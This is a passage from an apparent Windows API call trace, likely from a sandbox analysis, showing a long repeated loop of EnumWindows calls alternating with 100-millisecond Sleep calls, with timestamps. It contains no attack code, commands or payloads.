lParam=0x2830000) [0183.680] Sleep (dwMilliseconds=0x64) [0183.683] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.684] Sleep (dwMilliseconds=0x64) [0183.690] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.690] Sleep (dwMilliseconds=0x64) [0183.693] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.694] Sleep (dwMilliseconds=0x64) [0183.699] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.699] Sleep (dwMilliseconds=0x64) [0183.703] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.704] Sleep (dwMilliseconds=0x64) [0183.707] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.707] Sleep (dwMilliseconds=0x64) [0183.717] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.717] Sleep (dwMilliseconds=0x64) [0183.739] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.739] Sleep (dwMilliseconds=0x64) [0183.768] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.768] Sleep (dwMilliseconds=0x64) [0183.807] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.807] Sleep (dwMilliseconds=0x64) [0183.889] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.889] Sleep (dwMilliseconds=0x64) [0184.070] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.071] Sleep (dwMilliseconds=0x64) [0184.118] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.118] Sleep (dwMilliseconds=0x64) [0184.171] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.213] Sleep (dwMilliseconds=0x64) [0184.251] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.251] Sleep (dwMilliseconds=0x64) [0184.291] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.292] Sleep (dwMilliseconds=0x64) [0184.330] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.330] Sleep (dwMilliseconds=0x64) [0184.367] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.368] Sleep (dwMilliseconds=0x64) [0184.374] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.375] Sleep (dwMilliseconds=0x64) [0184.377] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.377] Sleep (dwMilliseconds=0x64) [0184.381] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.381] Sleep (dwMilliseconds=0x64) [0184.387] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.387] Sleep (dwMilliseconds=0x64) [0184.391] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.392] Sleep (dwMilliseconds=0x64) [0184.394] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.394] Sleep (dwMilliseconds=0x64) [0184.398] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.398] Sleep (dwMilliseconds=0x64) [0184.408] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.408] Sleep (dwMilliseconds=0x64) [0184.418] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.418] Sleep (dwMilliseconds=0x64) [0184.422] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.422] Sleep (dwMilliseconds=0x64) [0184.428] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.429] Sleep (dwMilliseconds=0x64) [0184.469] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.469] Sleep (dwMilliseconds=0x64) [0184.511] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.512] Sleep (dwMilliseconds=0x64) [0184.555] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.555] Sleep (dwMilliseconds=0x64) [0184.593] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.593] Sleep (dwMilliseconds=0x64) [0184.630] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.631] Sleep (dwMilliseconds=0x64) [0184.670] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.672] Sleep (dwMilliseconds=0x64) [0184.707] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.708] Sleep (dwMilliseconds=0x64) [0184.710] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.710] Sleep (dwMilliseconds=0x64) [0184.712] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.713] Sleep (dwMilliseconds=0x64) [0184.722] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.722] Sleep (dwMilliseconds=0x64) [0184.725] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.725] Sleep (dwMilliseconds=0x64) [0184.727] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.727] Sleep (dwMilliseconds=0x64) [0184.734] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.735] Sleep (dwMilliseconds=0x64) [0184.748] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.748] Sleep (dwMilliseconds=0x64) [0184.776] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.777] Sleep (dwMilliseconds=0x64) [0184.817] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.817] Sleep (dwMilliseconds=0x64) [0184.945] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0184.946] Sleep (dwMilliseconds=0x64) [0185.026] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.026] Sleep (dwMilliseconds=0x64) [0185.069] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.069] Sleep (dwMilliseconds=0x64) [0185.110] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.110] Sleep (dwMilliseconds=0x64) [0185.187] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.187] Sleep (dwMilliseconds=0x64) [0185.235] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.235] Sleep (dwMilliseconds=0x64) [0185.277] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.278] Sleep (dwMilliseconds=0x64) [0185.292] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.292] Sleep (dwMilliseconds=0x64) [0185.296] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.296] Sleep (dwMilliseconds=0x64) [0185.303] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.303] Sleep (dwMilliseconds=0x64) [0185.308] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.308] Sleep (dwMilliseconds=0x64) [0185.313] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.313] Sleep (dwMilliseconds=0x64) [0185.315] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.316] Sleep (dwMilliseconds=0x64) [0185.324] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.324] Sleep (dwMilliseconds=0x64) [0185.329] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.329] Sleep (dwMilliseconds=0x64) [0185.334] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.334] Sleep (dwMilliseconds=0x64) [0185.361] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.362] Sleep (dwMilliseconds=0x64) [0185.365] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.365] Sleep (dwMilliseconds=0x64) [0185.368] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.368] Sleep (dwMilliseconds=0x64) [0185.375] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.375] Sleep (dwMilliseconds=0x64) [0185.378] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.379] Sleep (dwMilliseconds=0x64) [0185.387] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.387] Sleep (dwMilliseconds=0x64) [0185.389] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.390] Sleep (dwMilliseconds=0x64) [0185.431] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.431] Sleep (dwMilliseconds=0x64) [0185.474] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.474] Sleep (dwMilliseconds=0x64) [0185.512] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.513] Sleep (dwMilliseconds=0x64) [0185.566] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.568] Sleep (dwMilliseconds=0x64) [0185.613] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.613] Sleep (dwMilliseconds=0x64) [0185.651] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.651] Sleep (dwMilliseconds=0x64) [0185.684] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.684] Sleep (dwMilliseconds=0x64) [0185.708] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.708] Sleep (dwMilliseconds=0x64) [0185.741] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.741] Sleep (dwMilliseconds=0x64) [0185.781] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.781] Sleep (dwMilliseconds=0x64) [0185.847] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.848] Sleep (dwMilliseconds=0x64) [0185.938] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.938] Sleep (dwMilliseconds=0x64) [0185.982] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0185.983] Sleep (dwMilliseconds=0x64) [0186.024] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.024] Sleep (dwMilliseconds=0x64) [0186.061] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.061] Sleep (dwMilliseconds=0x64) [0186.098] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.099] Sleep (dwMilliseconds=0x64) [0186.140] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.140] Sleep (dwMilliseconds=0x64) [0186.184] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.184] Sleep (dwMilliseconds=0x64) [0186.200] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.200] Sleep (dwMilliseconds=0x64) [0186.207] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.207] Sleep (dwMilliseconds=0x64) [0186.214] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.215] Sleep (dwMilliseconds=0x64) [0186.218] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.218] Sleep (dwMilliseconds=0x64) [0186.221] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.222] Sleep (dwMilliseconds=0x64) [0186.226] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.227] Sleep (dwMilliseconds=0x64) [0186.231] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.232] Sleep (dwMilliseconds=0x64) [0186.238] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.238] Sleep (dwMilliseconds=0x64) [0186.241] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.241] Sleep (dwMilliseconds=0x64) [0186.244] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.244] Sleep (dwMilliseconds=0x64) [0186.250] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.250] Sleep (dwMilliseconds=0x64) [0186.254] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.255] Sleep (dwMilliseconds=0x64) [0186.257] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.258] Sleep (dwMilliseconds=0x64) [0186.261] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.261] Sleep (dwMilliseconds=0x64) [0186.267] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.267] Sleep (dwMilliseconds=0x64) [0186.294] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.294] Sleep (dwMilliseconds=0x64) [0186.320] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.320] Sleep (dwMilliseconds=0x64) [0186.502] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.503] Sleep (dwMilliseconds=0x64) [0186.603] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.604] Sleep (dwMilliseconds=0x64) [0186.646] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.646] Sleep (dwMilliseconds=0x64) [0186.689] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.690] Sleep (dwMilliseconds=0x64) [0186.733] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.733] Sleep (dwMilliseconds=0x64) [0186.769] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.770] Sleep (dwMilliseconds=0x64) [0186.810] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.811] Sleep (dwMilliseconds=0x64) [0186.839] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.839] Sleep (dwMilliseconds=0x64) [0186.845] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.845] Sleep (dwMilliseconds=0x64) [0186.853] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.853] Sleep (dwMilliseconds=0x64) [0186.855] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.856] Sleep (dwMilliseconds=0x64) [0186.859] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.859] Sleep (dwMilliseconds=0x64) [0186.867] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.867] Sleep (dwMilliseconds=0x64) [0186.898] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.898] Sleep (dwMilliseconds=0x64) [0186.923] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0186.935] Sleep (dwMilliseconds=0x64) [0187.009] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.009] Sleep (dwMilliseconds=0x64) [0187.047] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.048] Sleep (dwMilliseconds=0x64) [0187.085] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.086] Sleep (dwMilliseconds=0x64) [0187.124] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.125] Sleep (dwMilliseconds=0x64) [0187.162] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.163] Sleep (dwMilliseconds=0x64) [0187.207] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.207] Sleep (dwMilliseconds=0x64) [0187.250] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.275] Sleep (dwMilliseconds=0x64) [0187.281] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.281] Sleep (dwMilliseconds=0x64) [0187.316] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.317] Sleep (dwMilliseconds=0x64) [0187.323] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.323] Sleep (dwMilliseconds=0x64) [0187.328] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.328] Sleep (dwMilliseconds=0x64) [0187.366] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.366] Sleep (dwMilliseconds=0x64) [0187.369] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.369] Sleep (dwMilliseconds=0x64) [0187.371] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.372] Sleep (dwMilliseconds=0x64) [0187.415] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.415] Sleep (dwMilliseconds=0x64) [0187.454] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.455] Sleep (dwMilliseconds=0x64) [0187.493] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.493] Sleep (dwMilliseconds=0x64) [0187.628] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.628] Sleep (dwMilliseconds=0x64) [0187.668] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.669] Sleep (dwMilliseconds=0x64) [0187.705] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.705] Sleep (dwMilliseconds=0x64) [0187.732] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.732] Sleep (dwMilliseconds=0x64) [0187.735] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.736] Sleep (dwMilliseconds=0x64) [0187.739] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.740] Sleep (dwMilliseconds=0x64) [0187.744] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.747] Sleep (dwMilliseconds=0x64) [0187.750] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.751] Sleep (dwMilliseconds=0x64) [0187.753] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.754] Sleep (dwMilliseconds=0x64) [0187.756] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.756] Sleep (dwMilliseconds=0x64) [0187.770] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.770] Sleep (dwMilliseconds=0x64) [0187.785] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.785] Sleep (dwMilliseconds=0x64) [0187.820] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.821] Sleep (dwMilliseconds=0x64) [0187.861] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.861] Sleep (dwMilliseconds=0x64) [0187.957] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0187.958] Sleep (dwMilliseconds=0x64) [0188.015] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.016] Sleep (dwMilliseconds=0x64) [0188.052] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.053] Sleep (dwMilliseconds=0x64) [0188.092] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.093] Sleep (dwMilliseconds=0x64) [0188.130] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.131] Sleep (dwMilliseconds=0x64) [0188.176] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.176] Sleep (dwMilliseconds=0x64) [0188.217] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.218] Sleep (dwMilliseconds=0x64) [0188.220] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.220] Sleep (dwMilliseconds=0x64) [0188.222] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.223] Sleep (dwMilliseconds=0x64) [0188.231] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.231] Sleep (dwMilliseconds=0x64) [0188.235] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.236] Sleep (dwMilliseconds=0x64) [0188.241] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.241] Sleep (dwMilliseconds=0x64) [0188.245] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.245] Sleep (dwMilliseconds=0x64) [0188.250] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.250] Sleep (dwMilliseconds=0x64) [0188.253] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.254] Sleep (dwMilliseconds=0x64) [0188.256] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.257] Sleep (dwMilliseconds=0x64) [0188.261] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.261] Sleep (dwMilliseconds=0x64) [0188.264] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.264] Sleep (dwMilliseconds=0x64) [0188.270] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.271] Sleep (dwMilliseconds=0x64) [0188.274] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.274] Sleep (dwMilliseconds=0x64) [0188.278] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.278] Sleep (dwMilliseconds=0x64) [0188.299] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.300] Sleep (dwMilliseconds=0x64) [0188.333] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.333] Sleep (dwMilliseconds=0x64) [0188.427] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.427] Sleep (dwMilliseconds=0x64) [0188.526] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.527] Sleep (dwMilliseconds=0x64) [0188.607] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.607] Sleep (dwMilliseconds=0x64) [0188.665] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.665] Sleep (dwMilliseconds=0x64) [0188.706] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.706] Sleep (dwMilliseconds=0x64) [0188.782] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.782] Sleep (dwMilliseconds=0x64) [0188.807] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.808] Sleep (dwMilliseconds=0x64) [0188.823] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.824] Sleep (dwMilliseconds=0x64) [0188.828] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.829] Sleep (dwMilliseconds=0x64) [0188.832] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.832] Sleep (dwMilliseconds=0x64) [0188.838] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.838] Sleep (dwMilliseconds=0x64) [0188.843] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.844] Sleep (dwMilliseconds=0x64) [0188.848] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.848] Sleep (dwMilliseconds=0x64) [0188.850] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.850] Sleep (dwMilliseconds=0x64) [0188.853] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.853] Sleep (dwMilliseconds=0x64) [0188.856] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.856] Sleep (dwMilliseconds=0x64) [0188.860] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.861] Sleep (dwMilliseconds=0x64) [0188.869] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.869] Sleep (dwMilliseconds=0x64) [0188.873] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.873] Sleep (dwMilliseconds=0x64) [0188.878] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.878] Sleep (dwMilliseconds=0x64) [0188.882] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.883] Sleep (dwMilliseconds=0x64) [0188.886] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.886] Sleep (dwMilliseconds=0x64) [0188.907] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.909] Sleep (dwMilliseconds=0x64) [0188.982] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0188.983] Sleep (dwMilliseconds=0x64) [0189.062] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.062] Sleep (dwMilliseconds=0x64) [0189.164] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.164] Sleep (dwMilliseconds=0x64) [0189.254] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.255] Sleep (dwMilliseconds=0x64) [0189.301] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.302] Sleep (dwMilliseconds=0x64) [0189.369] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.369] Sleep (dwMilliseconds=0x64) [0189.409] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.410] Sleep (dwMilliseconds=0x64) [0189.426] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.426] Sleep (dwMilliseconds=0x64) [0189.434] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.434] Sleep (dwMilliseconds=0x64) [0189.439] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.440] Sleep (dwMilliseconds=0x64) [0189.443] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.443] Sleep (dwMilliseconds=0x64) [0189.446] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.449] Sleep (dwMilliseconds=0x64) [0189.452] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.452] Sleep (dwMilliseconds=0x64) [0189.455] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.456] Sleep (dwMilliseconds=0x64) [0189.475] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.475] Sleep (dwMilliseconds=0x64) [0189.479] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.479] Sleep (dwMilliseconds=0x64) [0189.482] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.482] Sleep (dwMilliseconds=0x64) [0189.506] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.506] Sleep (dwMilliseconds=0x64) [0189.537] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.538] Sleep (dwMilliseconds=0x64) [0189.615] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.615] Sleep (dwMilliseconds=0x64) [0189.711] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.711] Sleep (dwMilliseconds=0x64) [0189.751] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.751] Sleep (dwMilliseconds=0x64) [0189.790] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.790] Sleep (dwMilliseconds=0x64) [0189.830] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.830] Sleep (dwMilliseconds=0x64) [0189.870] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0189.871] Sleep (dwMilliseconds=0x64) [0190.001] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.002] Sleep (dwMilliseconds=0x64) [0190.023] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.023] Sleep (dwMilliseconds=0x64) [0190.029] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.029] Sleep (dwMilliseconds=0x64) [0190.032] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.032] Sleep (dwMilliseconds=0x64) [0190.035] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.035] Sleep (dwMilliseconds=0x64) [0190.039] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.039] Sleep (dwMilliseconds=0x64) [0190.043] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.044] Sleep (dwMilliseconds=0x64) [0190.048] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.048] Sleep (dwMilliseconds=0x64) [0190.052] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.052] Sleep (dwMilliseconds=0x64) [0190.065] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.065] Sleep (dwMilliseconds=0x64) [0190.067] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.068] Sleep (dwMilliseconds=0x64) [0190.070] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.070] Sleep (dwMilliseconds=0x64) [0190.076] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.076] Sleep (dwMilliseconds=0x64) [0190.079] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.080] Sleep 